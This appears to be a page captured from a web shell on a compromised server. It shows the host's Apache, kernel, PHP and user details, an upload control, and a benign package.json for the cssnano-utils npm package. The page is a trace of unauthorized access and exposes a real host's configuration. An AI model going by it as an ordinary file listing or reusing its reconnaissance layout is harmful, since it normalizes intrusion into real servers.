( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/..//node_modules/cssnano-utils/package.json
{
  "name": "cssnano-utils",
  "version": "3.0.2",
  "repository": "cssnano/cssnano",
  "main": "src/index.js",
  "description": "Utility methods and plugin for cssnano projects",
  "homepage": "https://github.com/cssnano/cssnano",
  "bugs": {
    "url": "https://github.com/cssnano/cssnano/issues"
  },
  "engines": {
    "node": "^10 || ^12 || >=14.0"
  },
  "files": [
    "src",
    "LICENSE"
  ],
  "license": "MIT",
  "devDependencies": {
    "postcss": "^8.2.15"
  },
  "peerDependencies": {
    "postcss": "^8.2.15"
  },
  "readme": "# cssnano-utils\n\nUtility methods and plugin for cssnano projects\n\n## List of methods and plugin(s)\n\n| **utility methods** | **description**                                                           |\n| ------------------- | ------------------------------------------------------------------------- |\n| `rawCache`          | Postcss plugin to manage the raw value formatting for generated AST nodes |\n| `getArguments`      | Get a list of arguments, separated by a comma.                            |\n| `sameParent`        | Check that two PostCSS nodes share the same parent.                       |\n\n## Contributors\n\nSee [CONTRIBUTORS.md](https://github.com/cssnano/cssnano/blob/master/CONTRIBUTORS.md).\n"
}